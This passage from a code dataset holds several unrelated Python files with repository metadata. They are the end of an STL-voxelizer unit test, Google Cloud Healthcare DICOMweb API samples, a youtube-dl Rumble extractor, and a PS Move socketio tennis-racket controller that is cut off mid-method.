            [0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
            [0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0],
            [0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0],
            [0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
            [0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
            [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
        ]
        self.assertEqual(expected, actual.astype(int).tolist())
    def test_cross_line(self):
        """Regression cases: real-world line sets (captured from sample
        models at specific x columns) that previously tripped an assert
        or exception inside paint_y_axis; the test passes if no exception
        is raised."""
        pixels = np.zeros((100, 100), dtype=bool)
        # when z=133, x=55 at Eiffel_tower_sample.STL, resolution=100
        lines = [
            ((55.183775000510195, 42.91771076583979, 133.0), (54.664478438939994, 42.91190079807315, 133.0)),
            ((55.05365382117602, 48.399582783540694, 133.0), (54.28259953472679, 48.399582783540694, 133.0)),
            ((54.72938801464095, 51.1054056827822, 133.0), (55.21085292933077, 51.10540695761318, 133.0)),
            ((55.17312327125145, 54.131620716008165, 133.0), (54.72938801464095, 54.13161531213461, 133.0)),
            ((54.28259953472679, 48.399582783540694, 133.0), (55.05365382117602, 48.399582783540694, 133.0)),
            ((55.05365382117602, 50.600419560857354, 133.0), (54.28259953472679, 50.600419560857354, 133.0)),
            ((54.72938801464095, 44.868384133402195, 133.0), (55.21085292933077, 44.868386286857266, 133.0)),
            ((55.183775000510195, 56.0822892341602, 133.0), (54.664478438939994, 56.088101893431286, 133.0)),
            ((55.17312327125145, 47.89459328407937, 133.0), (54.72938801464095, 47.894596812904574, 133.0))
        ]
        x = 55
        # have assert or Exception in paint_y_axis()
        perimeter.paint_y_axis(lines, pixels, x)
        pixels = np.zeros((512, 512), dtype=bool)
        # python stltovoxel.py data/Model.stl data/Model.png 512
        lines = [
            ((164.09973516910665, 210.30269491875893, 292.0), (162.88562081679706, 211.99251111205203, 292.0)),
            ((163.6486419675717, 400.48144695905705, 292.0), (162.98334736067383, 399.69497154303264, 292.0)),
            ((163.12053950901193, 399.083573336035, 292.0), (162.75365385590837, 399.3013424292643, 292.0)),
            ((162.09875517681738, 155.11154635650513, 292.0), (163.03976252838729, 154.67417098395714, 292.0)),
            ((162.922318771988, 177.86366465114196, 292.0), (164.23901942305332, 178.47337917148627, 292.0))
        ]
        x = 163
        # have assert or Exception in paint_y_axis()
        perimeter.paint_y_axis(lines, pixels, x)
        pixels = np.zeros((1024, 1024), dtype=bool)
        # python stltovoxel.py data/Model.stl data/Model.png 1024
        lines = [
            ((478.1953748963024, 685.5971369469289, 390.0), (474.987648897627, 682.7858002239518, 390.0)),
            ((478.6458712360894, 708.867925235024, 390.0), (476.80635493021373, 709.6422457310404, 390.0)),
            ((476.8066506675348, 704.1490977931986, 390.0), (478.9686356730549, 707.4220913093288, 390.0)),
            ((475.51186735002426, 568.0120562125561, 390.0), (477.6508098598742, 568.5847941911843, 390.0)),
            ((476.9319294711261, 643.620807438934, 390.0), (477.55874656005545, 643.8324324309802, 390.0)),
            ((477.6538957136681, 644.1949502652121, 390.0), (476.50764488546764, 647.3730220867313, 390.0)),
            ((477.1678215835232, 574.2494597833005, 390.0), (475.625871469434, 575.2964648366983, 390.0)),
            ((476.71719857029177, 276.879543451238, 390.0), (478.92572111642284, 275.85023482493455, 390.0)),
            ((475.7395840585432, 726.9413018914573, 390.0), (477.6455166631113, 728.1006656939942, 390.0)),
            ((480.1531171455746, 424.8577588241842, 390.0), (474.50256297902456, 421.5806451519458, 390.0)),
            ((476.33245691945507, 647.8338656180929, 390.0), (477.3585664525454, 650.5878998039989, 390.0))
        ]
        x = 477
        # have assert or Exception in paint_y_axis()
        perimeter.paint_y_axis(lines, pixels, x)
if __name__ == '__main__':
    # Allow running this test module directly: python test_perimeter.py
    unittest.main()
| 56.317647
| 111
| 0.577815
|
4a0224722b512d34c74d30101a3b53aff74c32eb
| 12,805
|
py
|
Python
|
healthcare/api-client/dicom/dicomweb.py
|
nilold/python-docs-samples
|
a6405189fc47dd41b90c185061293105eebd8a94
|
[
"Apache-2.0"
] | 2
|
2021-08-04T19:13:44.000Z
|
2021-10-04T02:47:49.000Z
|
healthcare/api-client/dicom/dicomweb.py
|
nilold/python-docs-samples
|
a6405189fc47dd41b90c185061293105eebd8a94
|
[
"Apache-2.0"
] | 320
|
2020-11-08T21:02:43.000Z
|
2022-02-10T10:43:29.000Z
|
healthcare/api-client/dicom/dicomweb.py
|
nilold/python-docs-samples
|
a6405189fc47dd41b90c185061293105eebd8a94
|
[
"Apache-2.0"
] | 2
|
2019-11-04T18:25:20.000Z
|
2019-11-05T14:35:28.000Z
|
# Copyright 2018 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import os
from google.auth.transport import requests
from googleapiclient.errors import HttpError
from google.oauth2 import service_account
_BASE_URL = 'https://healthcare.googleapis.com/v1beta1'
def get_session(service_account_json):
    """Return a requests Session authorized with the given service
    account JSON file, scoped for cloud-platform access. The session is
    used for all requests against the Cloud Healthcare API endpoint."""
    creds = service_account.Credentials.from_service_account_file(
        service_account_json)
    scoped = creds.with_scopes(
        ['https://www.googleapis.com/auth/cloud-platform'])
    # AuthorizedSession injects/refreshes the OAuth token on each request.
    return requests.AuthorizedSession(scoped)
# [START healthcare_dicomweb_store_instance]
def dicomweb_store_instance(
        service_account_json,
        base_url,
        project_id,
        cloud_region,
        dataset_id,
        dicom_store_id,
        dcm_file):
    """Handles the POST requests specified in the DICOMweb standard.

    Uploads ``dcm_file`` (path to a .dcm file) to the store's STOW-RS
    ``/dicomWeb/studies`` endpoint. Returns the HTTP response on
    success, or an empty string on failure.
    """
    url = '{}/projects/{}/locations/{}'.format(base_url,
                                               project_id, cloud_region)
    dicomweb_path = '{}/datasets/{}/dicomStores/{}/dicomWeb/studies'.format(
        url, dataset_id, dicom_store_id)
    # Make an authenticated API request
    session = get_session(service_account_json)
    with open(dcm_file, 'rb') as dcm:
        dcm_content = dcm.read()
    content_type = 'application/dicom'
    headers = {'Content-Type': content_type}
    try:
        response = session.post(
            dicomweb_path,
            data=dcm_content,
            headers=headers)
        response.raise_for_status()
        print('Stored DICOM instance:')
        print(response.text)
        return response
    except HttpError as err:
        # NOTE(review): unlike the other helpers in this module, failures
        # here are swallowed and "" is returned. Also, session.post/
        # raise_for_status raise requests exceptions, not googleapiclient
        # HttpError — confirm this handler is ever actually hit.
        print(err)
        return ""
# [END healthcare_dicomweb_store_instance]
# [START healthcare_dicomweb_search_instances]
def dicomweb_search_instance(
        service_account_json,
        base_url,
        project_id,
        cloud_region,
        dataset_id,
        dicom_store_id):
    """Handles the GET requests specified in DICOMweb standard.

    Lists every DICOM instance in the store (QIDO-RS search), prints the
    JSON result, and returns it as a parsed object.
    """
    location_url = '{}/projects/{}/locations/{}'.format(base_url,
                                                        project_id, cloud_region)
    search_path = '{}/datasets/{}/dicomStores/{}/dicomWeb/instances'.format(
        location_url, dataset_id, dicom_store_id)
    # Make an authenticated API request
    session = get_session(service_account_json)
    headers = {
        'Content-Type': 'application/dicom+json; charset=utf-8'
    }
    response = session.get(search_path, headers=headers)
    response.raise_for_status()
    instances = response.json()
    print('Instances:')
    print(json.dumps(instances, indent=2))
    return instances
# [END healthcare_dicomweb_search_instances]
# [START healthcare_dicomweb_retrieve_study]
def dicomweb_retrieve_study(
        service_account_json,
        base_url,
        project_id,
        cloud_region,
        dataset_id,
        dicom_store_id,
        study_uid):
    """Handles the GET requests specified in the DICOMweb standard.

    Downloads the whole study (WADO-RS) as a multipart payload and
    writes it to ``study.multipart`` in the current directory.
    """
    url = '{}/projects/{}/locations/{}'.format(base_url,
                                               project_id, cloud_region)
    dicomweb_path = '{}/datasets/{}/dicomStores/{}/dicomWeb/studies/{}'.format(
        url, dataset_id, dicom_store_id, study_uid)
    # When specifying the output file, use an extension like ".multipart."
    # Then, parse the downloaded multipart file to get each individual
    # DICOM file.
    file_name = 'study.multipart'
    # Make an authenticated API request
    session = get_session(service_account_json)
    response = session.get(dicomweb_path)
    response.raise_for_status()
    with open(file_name, 'wb') as f:
        f.write(response.content)
    print('Retrieved study and saved to file ' +
          '{} in current directory'.format(file_name))
    return response
# [END healthcare_dicomweb_retrieve_study]
# [START healthcare_dicomweb_retrieve_instance]
def dicomweb_retrieve_instance(
        service_account_json,
        base_url,
        project_id,
        cloud_region,
        dataset_id,
        dicom_store_id,
        study_uid,
        series_uid,
        instance_uid):
    """Handles the GET requests specified in the DICOMweb standard.

    Downloads one DICOM instance (WADO-RS) and writes it to
    ``instance.dcm`` in the current directory.
    """
    url = '{}/projects/{}/locations/{}'.format(base_url,
                                               project_id, cloud_region)
    dicom_store_path = '{}/datasets/{}/dicomStores/{}'.format(
        url, dataset_id, dicom_store_id)
    dicomweb_path = '{}/dicomWeb/studies/{}/series/{}/instances/{}'.format(
        dicom_store_path, study_uid, series_uid, instance_uid)
    file_name = 'instance.dcm'
    # Make an authenticated API request
    session = get_session(service_account_json)
    # transfer-syntax=* asks the server for the instance in whatever
    # transfer syntax it is stored in (no transcoding).
    headers = {
        'Accept': 'application/dicom; transfer-syntax=*'
    }
    response = session.get(dicomweb_path, headers=headers)
    response.raise_for_status()
    with open(file_name, 'wb') as f:
        f.write(response.content)
    print('Retrieved DICOM instance and saved to file ' +
          '{} in current directory'.format(file_name))
    return response
# [END healthcare_dicomweb_retrieve_instance]
# [START healthcare_dicomweb_retrieve_rendered]
def dicomweb_retrieve_rendered(
        service_account_json,
        base_url,
        project_id,
        cloud_region,
        dataset_id,
        dicom_store_id,
        study_uid,
        series_uid,
        instance_uid):
    """Handles the GET requests specified in the DICOMweb standard.

    Fetches the server-rendered PNG of one instance (the ``/rendered``
    WADO-RS sub-resource) and writes it to ``rendered_image.png``.
    """
    url = '{}/projects/{}/locations/{}'.format(base_url,
                                               project_id, cloud_region)
    dicom_store_path = '{}/datasets/{}/dicomStores/{}'.format(
        url, dataset_id, dicom_store_id)
    instance_path = '{}/dicomWeb/studies/{}/series/{}/instances/{}'.format(
        dicom_store_path, study_uid, series_uid, instance_uid)
    dicomweb_path = '{}/rendered'.format(instance_path)
    file_name = 'rendered_image.png'
    # Make an authenticated API request
    session = get_session(service_account_json)
    # The Accept header selects the rendered output format.
    headers = {
        'Accept': 'image/png'
    }
    response = session.get(dicomweb_path, headers=headers)
    response.raise_for_status()
    with open(file_name, 'wb') as f:
        f.write(response.content)
    print('Retrieved rendered image and saved to file ' +
          '{} in current directory'.format(file_name))
    return response
# [END healthcare_dicomweb_retrieve_rendered]
# [START healthcare_dicomweb_delete_study]
def dicomweb_delete_study(
        service_account_json,
        base_url,
        project_id,
        cloud_region,
        dataset_id,
        dicom_store_id,
        study_uid):
    """Handles DELETE requests equivalent to the GET requests specified in
    the WADO-RS standard.
    """
    location_url = '{}/projects/{}/locations/{}'.format(base_url,
                                                        project_id, cloud_region)
    study_path = '{}/datasets/{}/dicomStores/{}/dicomWeb/studies/{}'.format(
        location_url, dataset_id, dicom_store_id, study_uid)
    # Make an authenticated API request
    session = get_session(service_account_json)
    headers = {
        'Content-Type': 'application/dicom+json; charset=utf-8'
    }
    response = session.delete(study_path, headers=headers)
    response.raise_for_status()
    print('Deleted study.')
    return response
# [END healthcare_dicomweb_delete_study]
def parse_command_line_args():
    """Parses command line arguments.

    Returns an argparse.Namespace with the shared flags plus a
    ``command`` attribute naming the chosen sub-command (or None).
    """
    parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    # Shared flags; several default to environment variables so the
    # samples run unmodified inside a configured gcloud environment.
    parser.add_argument(
        '--service_account_json',
        default=os.environ.get("GOOGLE_APPLICATION_CREDENTIALS"),
        help='Path to service account JSON file.')
    parser.add_argument(
        '--base_url',
        default=_BASE_URL,
        help='Healthcare API URL')
    parser.add_argument(
        '--project_id',
        default=(os.environ.get("GOOGLE_CLOUD_PROJECT")),
        help='GCP project name')
    parser.add_argument(
        '--cloud_region',
        default='us-central1',
        help='GCP region')
    parser.add_argument(
        '--dataset_id',
        default=None,
        help='Name of dataset')
    parser.add_argument(
        '--dicom_store_id',
        default=None,
        help='Name of DICOM store')
    parser.add_argument(
        '--dcm_file',
        default=None,
        help='File name for DCM file to store.')
    parser.add_argument(
        '--study_uid',
        default=None,
        help='Unique identifier for a study.')
    parser.add_argument(
        '--series_uid',
        default=None,
        help='Unique identifier for a series.')
    parser.add_argument(
        '--instance_uid',
        default=None,
        help='Unique identifier for an instance.')
    # One sub-command per sample function; run_command dispatches on it.
    command = parser.add_subparsers(dest='command')
    command.add_parser(
        'dicomweb-store-instance',
        help=dicomweb_store_instance.__doc__)
    command.add_parser(
        'dicomweb-search-instance',
        help=dicomweb_search_instance.__doc__)
    command.add_parser(
        'dicomweb-retrieve-study',
        help=dicomweb_retrieve_study.__doc__)
    command.add_parser(
        'dicomweb-retrieve-instance',
        help=dicomweb_retrieve_instance.__doc__)
    command.add_parser(
        'dicomweb-retrieve-rendered',
        help=dicomweb_retrieve_rendered.__doc__)
    command.add_parser(
        'dicomweb-delete-study',
        help=dicomweb_delete_study.__doc__)
    return parser.parse_args()
def run_command(args):
    """Calls the program using the specified command.

    Dispatches ``args.command`` to the matching dicomweb_* helper,
    forwarding the shared CLI flags. Unknown/absent commands fall
    through silently (argparse restricts the accepted values).
    """
    if args.project_id is None:
        print('You must specify a project ID or set the '
              '"GOOGLE_CLOUD_PROJECT" environment variable.')
        return
    elif args.command == 'dicomweb-store-instance':
        dicomweb_store_instance(
            args.service_account_json,
            args.base_url,
            args.project_id,
            args.cloud_region,
            args.dataset_id,
            args.dicom_store_id,
            args.dcm_file)
    elif args.command == 'dicomweb-search-instance':
        dicomweb_search_instance(
            args.service_account_json,
            args.base_url,
            args.project_id,
            args.cloud_region,
            args.dataset_id,
            args.dicom_store_id)
    elif args.command == 'dicomweb-retrieve-study':
        dicomweb_retrieve_study(
            args.service_account_json,
            args.base_url,
            args.project_id,
            args.cloud_region,
            args.dataset_id,
            args.dicom_store_id,
            args.study_uid)
    elif args.command == 'dicomweb-retrieve-instance':
        dicomweb_retrieve_instance(
            args.service_account_json,
            args.base_url,
            args.project_id,
            args.cloud_region,
            args.dataset_id,
            args.dicom_store_id,
            args.study_uid,
            args.series_uid,
            args.instance_uid)
    elif args.command == 'dicomweb-retrieve-rendered':
        dicomweb_retrieve_rendered(
            args.service_account_json,
            args.base_url,
            args.project_id,
            args.cloud_region,
            args.dataset_id,
            args.dicom_store_id,
            args.study_uid,
            args.series_uid,
            args.instance_uid)
    elif args.command == 'dicomweb-delete-study':
        dicomweb_delete_study(
            args.service_account_json,
            args.base_url,
            args.project_id,
            args.cloud_region,
            args.dataset_id,
            args.dicom_store_id,
            args.study_uid)
def main():
    # Entry point: parse CLI arguments and dispatch the chosen command.
    args = parse_command_line_args()
    run_command(args)
if __name__ == '__main__':
    main()
| 29.369266
| 79
| 0.642405
|
4a0225109b53b196d486a5820b8b35b71f8fbf32
| 2,184
|
py
|
Python
|
youtube_dl/extractor/rumble.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 66,635
|
2019-03-10T21:34:18.000Z
|
2022-03-31T23:50:31.000Z
|
youtube_dl/extractor/rumble.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 10,936
|
2019-03-10T21:35:47.000Z
|
2022-03-31T23:46:52.000Z
|
youtube_dl/extractor/rumble.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 15,194
|
2019-03-10T21:09:27.000Z
|
2022-03-31T22:13:49.000Z
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import compat_str
from ..utils import (
determine_ext,
int_or_none,
parse_iso8601,
try_get,
)
class RumbleEmbedIE(InfoExtractor):
    """Extractor for rumble.com embedded players.

    Fetches video metadata from Rumble's embedJS endpoint and builds the
    standard youtube-dl info dict.
    """
    _VALID_URL = r'https?://(?:www\.)?rumble\.com/embed/(?:[0-9a-z]+\.)?(?P<id>[0-9a-z]+)'
    _TESTS = [{
        'url': 'https://rumble.com/embed/v5pv5f',
        'md5': '36a18a049856720189f30977ccbb2c34',
        'info_dict': {
            'id': 'v5pv5f',
            'ext': 'mp4',
            'title': 'WMAR 2 News Latest Headlines | October 20, 6pm',
            'timestamp': 1571611968,
            'upload_date': '20191020',
        }
    }, {
        'url': 'https://rumble.com/embed/ufe9n.v5pv5f',
        'only_matching': True,
    }]
    def _real_extract(self, url):
        video_id = self._match_id(url)
        video = self._download_json(
            'https://rumble.com/embedJS/', video_id,
            query={'request': 'video', 'v': video_id})
        title = video['title']
        formats = []
        # 'ua' maps a height string to a list; indices 0/1 appear to be
        # format URLs and index i+2 a metadata dict carrying 'bitrate'
        # (assumption inferred from the indexing below — TODO confirm
        # against a live embedJS response).
        for height, ua in (video.get('ua') or {}).items():
            for i in range(2):
                f_url = try_get(ua, lambda x: x[i], compat_str)
                if f_url:
                    ext = determine_ext(f_url)
                    f = {
                        'ext': ext,
                        'format_id': '%s-%sp' % (ext, height),
                        'height': int_or_none(height),
                        'url': f_url,
                    }
                    bitrate = try_get(ua, lambda x: x[i + 2]['bitrate'])
                    if bitrate:
                        f['tbr'] = int_or_none(bitrate)
                    formats.append(f)
        self._sort_formats(formats)
        author = video.get('author') or {}
        return {
            'id': video_id,
            'title': title,
            'formats': formats,
            'thumbnail': video.get('i'),
            'timestamp': parse_iso8601(video.get('pubDate')),
            'channel': author.get('name'),
            'channel_url': author.get('url'),
            'duration': int_or_none(video.get('duration')),
        }
| 32.117647
| 90
| 0.486264
|
4a022514e05eb6f903a2463e07ac3198958a0d90
| 15,996
|
py
|
Python
|
rackets/src/rackets/sio_racket.py
|
alexoneill/15-love
|
bf7d1abbba7583d9686790d06b31b7fff5e8fcf4
|
[
"MIT"
] | 1
|
2017-04-30T13:06:02.000Z
|
2017-04-30T13:06:02.000Z
|
rackets/src/rackets/sio_racket.py
|
alexoneill/15-love
|
bf7d1abbba7583d9686790d06b31b7fff5e8fcf4
|
[
"MIT"
] | null | null | null |
rackets/src/rackets/sio_racket.py
|
alexoneill/15-love
|
bf7d1abbba7583d9686790d06b31b7fff5e8fcf4
|
[
"MIT"
] | null | null | null |
# sio_racket.py
# aoneill - 04/28/17
import math
import mock
import random
import socketIO_client as sio
from libs import psmoveapi
from src.base import event
from src.base import racket
from src.events import clear_event
class GameState(object):
  '''
  Game states for the controller.
  '''
  # Pre-game: player picks a color, waits for server confirmation,
  # then waits for the match to start.
  COLOR_SELECTION = 0
  COLOR_WAIT = 1
  START_WAIT = 2
  # In-game states driven by socketio events.
  SERVER = 3
  GAMEPLAY = 4
  HIT_BALL = 5
  WON_RALLY = 6
  LOST_RALLY = 7
  # Terminal states after game_over.
  END_GAME_WIN = 8
  END_GAME_LOST = 9
def filter_player(func):
  '''
  Decorator for socketio handlers: only forward events whose
  'player_num' matches this racket's player; strip that key and pass
  the remaining payload (or nothing, if the payload is then empty).
  '''
  def wrapper(self, data):
    # Ignore events addressed to other players (or with no player tag).
    if(('player_num' not in data) or (data['player_num'] != self.player_num)):
      return
    del data['player_num']
    if(len(data) > 0):
      func(self, data)
    else:
      func(self)
  return wrapper
class SIORacket(racket.Racket):
  '''
  socketio-based racket for gameplay.
  This class includes many different events for actual gameplay!
  '''
  # Face-button -> RGB color choices offered during color selection.
  COLORS = {
    psmoveapi.Button.SQUARE: (255.0 / 255.0, 105.0 / 255.0, 180.0 / 255.0),
    psmoveapi.Button.TRIANGLE: ( 64.0 / 255.0, 255.0 / 255.0, 64.0 / 255.0),
    psmoveapi.Button.CROSS: (24.0 / 255.0, 135.0 / 255.0, 189.0 / 255.0),
    psmoveapi.Button.CIRCLE: (255.0 / 255.0, 168.0 / 255.0, 24.0 / 255.0)
  }
  # Base colors
  COLOR_BAD = (1.0, 0, 0)
  COLOR_GOOD = (0, 1.0, 0)
  COLOR_CLEAR = (1.0, 1.0, 1.0)
  # Colors for game outcomes
  COLOR_LOSE = COLOR_BAD
  COLOR_WIN = COLOR_GOOD
  # Times for animations (seconds, presumably — TODO confirm against
  # the Event class in src.base.event)
  COLOR_TRANS_TIME = 0.2
  COLOR_WAIT_TIME = 0.1
  COLOR_CONFIRM_TIME = 0.5
  COLOR_REJECT_TIME = 0.25
  SERVER_TIME = 1.0
  HIT_TIME = 0.5
  WON_RALLY_TIME = 1.0
  LOST_RALLY_TIME = 1.0
  OVER_TIME = 5.0
  def __init__(self, sio_host, sio_port, player_num):
    '''
    Connect to the game server at sio_host:sio_port, register all
    socketio event handlers, and start in the color-selection state.
    '''
    super(SIORacket, self).__init__()
    # Save parameters
    self.sio_host = sio_host
    self.sio_port = sio_port
    self.player_num = player_num
    # socketio config
    self._sio = sio.SocketIO(self.sio_host, self.sio_port)
    # socketio callbacks
    # Basic
    self._sio.on('connect', self.on_sio_connect)
    self._sio.on('disconnect', self.on_sio_disconnect)
    # Game-based - Listening
    self._sio.on('init_color_reject', self.on_sio_init_color_reject)
    self._sio.on('init_color_confirm', self.on_sio_init_color_confirm)
    self._sio.on('game_is_server', self.on_sio_game_is_server)
    self._sio.on('game_missed_ball', self.on_sio_game_missed_ball)
    self._sio.on('game_hit_ball', self.on_sio_game_hit_ball)
    self._sio.on('game_won_rally', self.on_sio_game_won_rally)
    self._sio.on('game_over', self.on_sio_game_over)
    print 'socketio: init'
    # Other parameters: current state machine position, pending
    # animation queue, chosen color, and whether swings are reported.
    self.state = GameState.COLOR_SELECTION
    self.state_data = None
    self.color_choice = None
    self.enable_swings = False
    print 'racket: init'
################################ Helpers #####################################
  def generic_flash(self, freq = 1, rumble = True, color = True,
                    invert_color = False, invert_rumble = False, scale = 1.0,
                    color_scale = 1.0, rumble_scale = 1.0, color_min = 0.0,
                    rumble_min = 0.0):
    '''
    Build an animation callback that pulses the controller's LED and/or
    rumble with a cosine wave over the event's [0, 1] time span.
    NOTE(review): color_min and rumble_min are accepted but never used
    in the body below — confirm whether clamping to a floor was intended.
    '''
    # Generate a function which produces a 'flashing' effect on the rumble
    # colors for the controller
    def flash(time, controller, color_rgb):
      # Given a color to flash around and the controller, flash based on the
      # time argument (assumed to go from [0, 1])
      # Get base power
      power = (1 - math.cos(time * (2 * math.pi) * freq))/2
      power = min(1.0, max(0.0, power * scale))
      # Get color power
      color_power = min(1.0, max(0.0, power * color_scale))
      color_power = color_power if(invert_color) else (1 - color_power)
      # Get rumble power
      rumble_power = min(1.0, max(0.0, power * rumble_scale))
      rumble_power = (1 - rumble_power) if(invert_rumble) else rumble_power
      # Get the color
      color_flash = tuple(map(lambda x: x * color_power, list(color_rgb)))
      if(color):
        controller.color = psmoveapi.RGB(*color_flash)
      if(rumble):
        controller.rumble = rumble_power
    return flash
  def generic_color_trans(self, source, target):
    '''
    Build an animation callback that linearly interpolates the LED from
    source to target over the event's [0, 1] time span. A None endpoint
    stands for the player's chosen color (self.color_choice).
    '''
    # Generate a function which produces a simple linear transition between
    # two colors
    def trans(time, controller, _):
      # If the source is None, we consider this to actually be the user-chosen
      # color (from the start)
      source_rgb = source
      if(source_rgb is None):
        source_rgb = self.color_choice
      # Similar for the target
      target_rgb = target
      if(target_rgb is None):
        target_rgb = self.color_choice
      # Unpack
      (sr, sg, sb) = source_rgb
      (tr, tg, tb) = target_rgb
      # Scale and color
      scale = lambda a, b: a + (b - a) * time
      color = (scale(sr, tr), scale(sg, tg), scale(sb, tb))
      controller.color = psmoveapi.RGB(*color)
    return trans
######################## socketio Housekeeping ###############################
  def on_sio_connect(self):
    '''Log that the socketio connection was established.'''
    # Log the connection
    print 'socketio: Connected'
  def on_sio_disconnect(self):
    '''Log that the socketio connection was dropped.'''
    # Log the drop
    print 'socketio: Disconnected'
######################### socketio Listeners #################################
  # NOTE(review): every handler below has its @filter_player decorator
  # commented out, so the callbacks currently fire regardless of the
  # event's player_num — confirm whether this is intentional (it appears
  # to support the local PS-button simulation in on_button).
  # Each handler sets self.state and queues (event, color) pairs in
  # self.state_data['events']; on_refresh plays them back in order.
  # @filter_player
  def on_sio_init_color_confirm(self):
    # Callback for a color confirmation event
    print 'socketio: init_color_confirm'
    # Ready for swings!
    self.enable_swings = True
    # Parameterize the transition with animations
    self.state = GameState.START_WAIT
    self.state_data = {
      'events': [
        (event.Event(SIORacket.COLOR_CONFIRM_TIME,
                     self.generic_flash(freq = 3, color_scale = 0.75)), None),
        (clear_event.ClearEvent(), None)
      ]
    }
  # @filter_player
  def on_sio_init_color_reject(self):
    # Callback for a color rejection event
    print 'socketio: init_color_reject'
    # Disable swings (not at the game yet)
    self.enable_swings = False
    # Parameterize the transition with animations: fade to red, flash,
    # then fade back to the (to-be-rechosen) color.
    self.state = GameState.COLOR_SELECTION
    self.state_data = {
      'events': [
        (event.Event(SIORacket.COLOR_TRANS_TIME,
                     self.generic_color_trans(None, SIORacket.COLOR_BAD)), None),
        (event.Event(SIORacket.COLOR_REJECT_TIME,
                     self.generic_flash()), SIORacket.COLOR_BAD),
        (clear_event.ClearEvent(clear_color = True), SIORacket.COLOR_BAD),
        (event.Event(SIORacket.COLOR_TRANS_TIME,
                     self.generic_color_trans(SIORacket.COLOR_BAD, None)), None)
      ]
    }
  # @filter_player
  def on_sio_game_is_server(self):
    # Callback for when the player becomes the person serving the ball
    print 'socketio: game_is_server'
    # Keep swings enabled
    self.enable_swings = True
    # Parameterize the transition with animations
    self.state = GameState.SERVER
    self.state_data = {
      'events': [
        (event.Event(SIORacket.SERVER_TIME,
                     self.generic_flash(freq = 2)), None),
        (clear_event.ClearEvent(), None)
      ]
    }
  # @filter_player
  def on_sio_game_missed_ball(self):
    # Callback for a missed ball event
    print 'socketio: game_missed_ball'
    # Keep swings enabled
    self.enable_swings = True
    # Parameterize the transition with animations: fade to the lose
    # color, flash, then fade back to the player's color.
    self.state = GameState.LOST_RALLY
    self.state_data = {
      'events': [
        (event.Event(SIORacket.COLOR_TRANS_TIME,
                     self.generic_color_trans(None, SIORacket.COLOR_LOSE)), None),
        (event.Event(SIORacket.LOST_RALLY_TIME,
                     self.generic_flash(freq = 2)), SIORacket.COLOR_LOSE),
        (clear_event.ClearEvent(clear_color = True), SIORacket.COLOR_LOSE),
        (event.Event(SIORacket.COLOR_TRANS_TIME,
                     self.generic_color_trans(SIORacket.COLOR_LOSE, None)), None)
      ]
    }
  # @filter_player
  def on_sio_game_hit_ball(self, data):
    # Callback for a hit ball event
    print 'socketio: game_hit_ball'
    # Parse parameters: swing strength scales the flash brightness.
    strength = data['strength']
    # Keep swings enabled
    self.enable_swings = True
    # Parameterize the transition with animations
    self.state = GameState.HIT_BALL
    self.state_data = {
      'events': [
        (event.Event(SIORacket.HIT_TIME,
                     self.generic_flash(color_scale = strength)), None),
        (clear_event.ClearEvent(), None)
      ]
    }
  # @filter_player
  def on_sio_game_won_rally(self):
    # Callback for when a player wins the rally
    print 'socketio: game_won_rally'
    # Keep swings enabled
    self.enable_swings = True
    # Parameterize the transition with animations: fade to the win
    # color, flash, then fade back to the player's color.
    self.state = GameState.WON_RALLY
    self.state_data = {
      'events': [
        (event.Event(SIORacket.COLOR_TRANS_TIME,
                     self.generic_color_trans(None, SIORacket.COLOR_WIN)), None),
        (event.Event(SIORacket.WON_RALLY_TIME,
                     self.generic_flash(freq = 2)), SIORacket.COLOR_WIN),
        (clear_event.ClearEvent(clear_color = True), SIORacket.COLOR_WIN),
        (event.Event(SIORacket.COLOR_TRANS_TIME,
                     self.generic_color_trans(SIORacket.COLOR_WIN, None)), None),
      ]
    }
  # @filter_player
  def on_sio_game_over(self, data):
    # Callback for when the game ends
    print 'socketio: game_over'
    # Parse parameters
    is_winner = data['is_winner']
    # Disable swings
    self.enable_swings = False
    # Chose which color and which end-state
    color = SIORacket.COLOR_WIN
    if(is_winner):
      self.state = GameState.END_GAME_WIN
    else:
      color = SIORacket.COLOR_LOSE
      self.state = GameState.END_GAME_LOST
    # Parameterize the transition with animations; ends on COLOR_CLEAR
    # since the next game starts back at color selection.
    self.state_data = {
      'events': [
        (event.Event(SIORacket.COLOR_TRANS_TIME,
                     self.generic_color_trans(None, color)), None),
        (event.Event(SIORacket.OVER_TIME,
                     self.generic_flash(freq = 5)), color),
        (clear_event.ClearEvent(clear_color = True), color),
        (event.Event(SIORacket.COLOR_TRANS_TIME,
                     self.generic_color_trans(color, SIORacket.COLOR_CLEAR)), None)
      ]
    }
########################### socketio Emits ###################################
  def sio_init_color_choice(self, color):
    '''Tell the server which color this player chose.'''
    # Method to communicate the color choice
    self._sio.emit('init_color_choice', {
      'player_num': self.player_num,
      'color': color,
    })
  def sio_game_swing(self, hand, strength):
    '''Report a swing to the server (hand encoded 0=left, 1=right).'''
    # Method to communicate the swing event
    self._sio.emit('game_swing', {
      'player_num': self.player_num,
